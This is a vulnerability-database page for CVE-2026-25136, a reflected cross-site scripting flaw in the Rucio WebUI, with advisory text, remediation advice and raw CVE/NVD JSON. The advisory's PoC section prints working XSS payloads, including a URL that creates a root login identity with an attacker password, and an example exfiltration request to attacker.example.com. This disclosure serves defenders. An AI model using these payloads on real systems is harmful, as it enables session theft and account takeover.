Vulnerability-Lookup

CVE-2026-25136 (GCVE-0-2026-25136)

Vulnerability from cvelistv5 – Published: 2026-02-25 18:57 – Updated: 2026-02-26 20:44

Title

Rucio WebUI has a Reflected Cross-site Scripting Vulnerability

Summary

Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-1004 - Sensitive Cookie Without 'HttpOnly' Flag

Assigner

GitHub_M

References

URL

Tags

	https://github.com/rucio/rucio/security/advisorie…	x_refsource_CONFIRM
	https://cheatsheetseries.owasp.org/cheatsheets/Cr…	x_refsource_MISC
	https://github.com/rucio/rucio/releases/tag/35.8.3	x_refsource_MISC
	https://github.com/rucio/rucio/releases/tag/38.5.4	x_refsource_MISC
	https://github.com/rucio/rucio/releases/tag/39.3.1	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	rucio	rucio	Affected: < 35.8.3 Affected: >= 36.0.0rc1, < 38.5.4 Affected: >= 39.0.0rc1, < 39.3.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25136",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-26T20:44:39.867866Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-26T20:44:57.174Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "rucio",
          "vendor": "rucio",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 35.8.3"
            },
            {
              "status": "affected",
              "version": "\u003e= 36.0.0rc1, \u003c 38.5.4"
            },
            {
              "status": "affected",
              "version": "\u003e= 39.0.0rc1, \u003c 39.3.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1004",
              "description": "CWE-1004: Sensitive Cookie Without \u0027HttpOnly\u0027 Flag",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-25T18:57:28.589Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q"
        },
        {
          "name": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
        },
        {
          "name": "https://github.com/rucio/rucio/releases/tag/35.8.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
        },
        {
          "name": "https://github.com/rucio/rucio/releases/tag/38.5.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
        },
        {
          "name": "https://github.com/rucio/rucio/releases/tag/39.3.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
        }
      ],
      "source": {
        "advisory": "GHSA-h79m-5jjm-jm4q",
        "discovery": "UNKNOWN"
      },
      "title": "Rucio WebUI has a Reflected Cross-site Scripting Vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25136",
    "datePublished": "2026-02-25T18:57:28.589Z",
    "dateReserved": "2026-01-29T14:03:42.540Z",
    "dateUpdated": "2026-02-26T20:44:57.174Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25136\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-25T20:23:47.273\",\"lastModified\":\"2026-02-25T20:23:47.273\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"},{\"lang\":\"en\",\"value\":\"CWE-1004\"}]}],\"references\":[{\"url\":\"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rucio/rucio/releases/tag/35.8.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rucio/rucio/releases/tag/38.5.4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rucio/rucio/releases/tag/39.3.1\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

GHSA-H79M-5JJM-JM4Q

Vulnerability from github – Published: 2026-02-25 18:53 – Updated: 2026-02-25 18:53

Summary

Rucio WebUI has a Reflected Cross-site Scripting Vulnerability

Details

Summary

A reflected Cross-site Scripting vulnerability was located in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL.

Details

The WebUI error message renders ExceptionMessage (which can contain user-controlled input) as unencoded HTML. Server code that produces the message is in common.py - specifically error_headers -> _error_response -> generate_http_error_flask, which places ExceptionMessage into both response headers and the JSON body. The WebUI client then injects that text into the DOM using unsafe methods (examples in lib/rucio/web/ui/static/*.js such as rule.js, request_rule.js, list_rules.js) with jQuery.html(...) or equivalent, enabling reflected XSS when an attacker-controlled value is included in an error message (e.g. account, attribute, scope).

PoC

1) Reflected XSS via account parameter (browse or load URL in WebUI context):

https://127.0.0.1:8443/ui/account_rse_usage?account=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E

Server response (excerpt):

HTTP/1.1 500 INTERNAL SERVER ERROR
ExceptionClass: AccountNotFound
ExceptionMessage: Account <img src=x onerror=alert(document.cookie)> does not exist
Content-Type: application/octet-stream

{"ExceptionClass":"AccountNotFound","ExceptionMessage":"Account <img src=x onerror=alert(document.cookie)> does not exist"}

XSS payload triggering (Displaying session token) when browsing to crafted URL

When the WebUI inserts ExceptionMessage into the page with .html(...), the injected executes and displays the users' session tokens. Note that this is a PoC only, an attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).

2) Reflected XSS via account key attribute creation error:

POST /proxy/accounts/pentest/attr/XSS HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Origin: https://127.0.0.1:8443
X-Rucio-Script: webui::-ui-account
{"key":"XSS","value":"<script>alert(document.cookie)</script>"}

XSS payload triggering (Displaying session token) on error when creating account key

Server response (excerpt) contains ExceptionMessage with the raw <script> payload; the WebUI renders it unsafely and script executes. Note that this method is less impactful since it's not something that can be triggered with a URL alone, but is listed to show that this issue affects multiple locations.

Impact

Any authenticated WebUI user who follows a crafted link or triggers a request containing attacker-controlled input in a field that causes an error may execute arbitrary JavaScript in the WebUI origin. This vulnerability is more impactful due to the lack of protection of cookies (The Session token does not have HttpOnly attribute) and lack of Content Security Policy that would prevent thrid-party scripts from loading.

Attackers can steal session cookies/tokens or perform actions as the victim like creating a new UserPass identity with an attacker known password.

Example URL to Create UserPass for Root

https://localhost:8443/ui/account_rse_usage?account=%3Cimg%20src%3Dx%20onerror%3D(function()%7Bo%3D%7B%7D%3Bo.method%3D'PUT'%3Bo.credentials%3D'include'%3Bo.headers%3D%7B'X-Rucio-Username'%3A'attackeruser'%2C'X-Rucio-Password'%3A'AttackerPassword123'%2C'X-Rucio-Email'%3A'demo%40example.org'%2C'X-Rucio-Auth-Token'%3Atoken%7D%3Bfetch(String.fromCharCode(47)%2B'identities'%2BString.fromCharCode(47)%2B'root'%2BString.fromCharCode(47)%2B'userpass'%2Co)%7D)()%3E

Account Payload to Create UserPass

<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>

Creating identity for Root account via reflected XSS

All WebUI users are impacted.

Remediation / Mitigation

Change all client-side insertions of server-provided text from .html(...) to .text() or create text nodes / escape HTML before insertion. Example: replace $('#elem').html(msg) with $('#elem').empty().append($('<span>').text(msg)).

Additionally, consider adding a Content Security Policy (CSP) to mitigate external script execution and set the HTTPOnly flag for session cookies. Also, the API token should not be set in a JavaScript variable as it can be accessed by an attacker even with the HTTPOnly flag set on the session cookie.

Note that many pages were found setting the API token as token in an authenticated response like var token = "root-root-webui-...:" (See /ui/list_accounts for example)

References:

Server functions: common.py (error_headers, _error_response, generate_http_error_flask)
Example client files to fix: lib/rucio/web/ui/static/rule.js, lib/rucio/web/ui/static/request_rule.js, list_rules.js
OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "35.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "36.0.0rc1"
            },
            {
              "fixed": "38.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "39.0.0rc1"
            },
            {
              "fixed": "39.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25136"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:53:29Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nA reflected Cross-site Scripting vulnerability was located in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL.\n\n#### Details\nThe WebUI error message renders `ExceptionMessage` (which can contain user-controlled input) as unencoded HTML. Server code that produces the message is in `common.py` - specifically `error_headers -\u003e _error_response -\u003e generate_http_error_flask`, which places `ExceptionMessage` into both response headers and the JSON body. The WebUI client then injects that text into the DOM using unsafe methods (examples in `lib/rucio/web/ui/static/*.js` such as `rule.js`, `request_rule.js`, `list_rules.js`) with `jQuery.html(...)` or equivalent, enabling reflected XSS when an attacker-controlled value is included in an error message (e.g. account, attribute, scope).\n\n### PoC\n1) Reflected XSS via account parameter (browse or load URL in WebUI context):\n```text\nhttps://127.0.0.1:8443/ui/account_rse_usage?account=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E\n```\nServer response (excerpt):\n```http\nHTTP/1.1 500 INTERNAL SERVER ERROR\nExceptionClass: AccountNotFound\nExceptionMessage: Account \u003cimg src=x onerror=alert(document.cookie)\u003e does not exist\nContent-Type: application/octet-stream\n\n{\"ExceptionClass\":\"AccountNotFound\",\"ExceptionMessage\":\"Account \u003cimg src=x onerror=alert(document.cookie)\u003e does not exist\"}\n```\n\n**XSS payload triggering (Displaying session token) when browsing to crafted URL**\n\u003cimg width=\"1210\" height=\"510\" alt=\"XSS payload triggering (Displaying session token) when browsing to crafted URL\" src=\"https://github.com/user-attachments/assets/989a0aed-628d-4f1c-bbfb-de434dab8af6\" /\u003e\n\nWhen the WebUI inserts `ExceptionMessage` into the page with `.html(...)`, the injected \u003cimg onerror=...\u003e executes and displays the users\u0027 session tokens. Note that this is a PoC only, an attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\n2) Reflected XSS via account key attribute creation error:\n```http\nPOST /proxy/accounts/pentest/attr/XSS HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nOrigin: https://127.0.0.1:8443\nX-Rucio-Script: webui::-ui-account\n{\"key\":\"XSS\",\"value\":\"\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\"}\n```\n\n**XSS payload triggering (Displaying session token) on error when creating account key**\n\u003cimg width=\"1322\" height=\"593\" alt=\"XSS payload triggering (Displaying session token) on error when creating account key\" src=\"https://github.com/user-attachments/assets/151cb0ad-e4f0-498e-954e-be3455ca8a72\" /\u003e\n\nServer response (excerpt) contains `ExceptionMessage` with the raw `\u003cscript\u003e` payload; the WebUI renders it unsafely and script executes. Note that this method is less impactful since it\u0027s not something that can be triggered with a URL alone, but is listed to show that this issue affects multiple locations.\n\n### Impact\nAny authenticated WebUI user who follows a crafted link or triggers a request containing attacker-controlled input in a field that causes an error may execute arbitrary JavaScript in the WebUI origin. This vulnerability is more impactful due to the lack of protection of cookies (The Session token does not have HttpOnly attribute) and lack of Content Security Policy that would prevent thrid-party scripts from loading.\n\nAttackers can steal session cookies/tokens or perform actions as the victim like creating a new UserPass identity with an attacker known password. \n\n**Example URL to Create UserPass for Root**\n```\nhttps://localhost:8443/ui/account_rse_usage?account=%3Cimg%20src%3Dx%20onerror%3D(function()%7Bo%3D%7B%7D%3Bo.method%3D\u0027PUT\u0027%3Bo.credentials%3D\u0027include\u0027%3Bo.headers%3D%7B\u0027X-Rucio-Username\u0027%3A\u0027attackeruser\u0027%2C\u0027X-Rucio-Password\u0027%3A\u0027AttackerPassword123\u0027%2C\u0027X-Rucio-Email\u0027%3A\u0027demo%40example.org\u0027%2C\u0027X-Rucio-Auth-Token\u0027%3Atoken%7D%3Bfetch(String.fromCharCode(47)%2B\u0027identities\u0027%2BString.fromCharCode(47)%2B\u0027root\u0027%2BString.fromCharCode(47)%2B\u0027userpass\u0027%2Co)%7D)()%3E\n```\n\n**Account Payload to Create UserPass**\n```html\n\u003cimg src=x onerror=(function(){o={};o.method=\u0027PUT\u0027;o.credentials=\u0027include\u0027;o.headers={\u0027X-Rucio-Username\u0027:\u0027attackeruser\u0027,\u0027X-Rucio-Password\u0027:\u0027AttackerPassword123\u0027,\u0027X-Rucio-Email\u0027:\u0027demo@example.org\u0027,\u0027X-Rucio-Auth-Token\u0027:token};fetch(String.fromCharCode(47)+\u0027identities\u0027+String.fromCharCode(47)+\u0027root\u0027+String.fromCharCode(47)+\u0027userpass\u0027,o)})()\u003e\n```\n\n**Creating identity for Root account via reflected XSS**\n\u003cimg width=\"1558\" height=\"957\" alt=\"Creating identity for Root account via reflected XSS\" src=\"https://github.com/user-attachments/assets/539bfff4-70f3-42c5-b83a-10b5f85d6d44\" /\u003e\n\nAll WebUI users are impacted.\n\n### Remediation / Mitigation\nChange all client-side insertions of server-provided text from `.html(...)` to `.text()` or create text nodes / escape HTML before insertion. Example: replace `$(\u0027#elem\u0027).html(msg)` with `$(\u0027#elem\u0027).empty().append($(\u0027\u003cspan\u003e\u0027).text(msg))`.\n\nAdditionally, consider adding a Content Security Policy (CSP) to mitigate external script execution and set the HTTPOnly flag for session cookies. Also, the API token should not be set in a JavaScript variable as it can be accessed by an attacker even with the HTTPOnly flag set on the session cookie.\n\n\u003e Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n#### References:\n- Server functions: `common.py` (`error_headers`, `_error_response, generate_http_error_flask`)\n- Example client files to fix: `lib/rucio/web/ui/static/rule.js`, `lib/rucio/web/ui/static/request_rule.js, list_rules.js`\n- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html",
  "id": "GHSA-h79m-5jjm-jm4q",
  "modified": "2026-02-25T18:53:29Z",
  "published": "2026-02-25T18:53:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q"
    },
    {
      "type": "WEB",
      "url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rucio/rucio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Rucio WebUI has a Reflected Cross-site Scripting Vulnerability"
}

FKIE_CVE-2026-25136

Vulnerability from fkie_nvd - Published: 2026-02-25 20:23 - Updated: 2026-02-25 20:23

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
	security-advisories@github.com	https://github.com/rucio/rucio/releases/tag/35.8.3
	security-advisories@github.com	https://github.com/rucio/rucio/releases/tag/38.5.4
	security-advisories@github.com	https://github.com/rucio/rucio/releases/tag/39.3.1
	security-advisories@github.com	https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue."
    }
  ],
  "id": "CVE-2026-25136",
  "lastModified": "2026-02-25T20:23:47.273",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-25T20:23:47.273",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        },
        {
          "lang": "en",
          "value": "CWE-1004"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25136 (GCVE-0-2026-25136)

GHSA-H79M-5JJM-JM4Q

Summary

Details

PoC

Impact

Remediation / Mitigation

References:

FKIE_CVE-2026-25136

Tags

Sightings

Nomenclature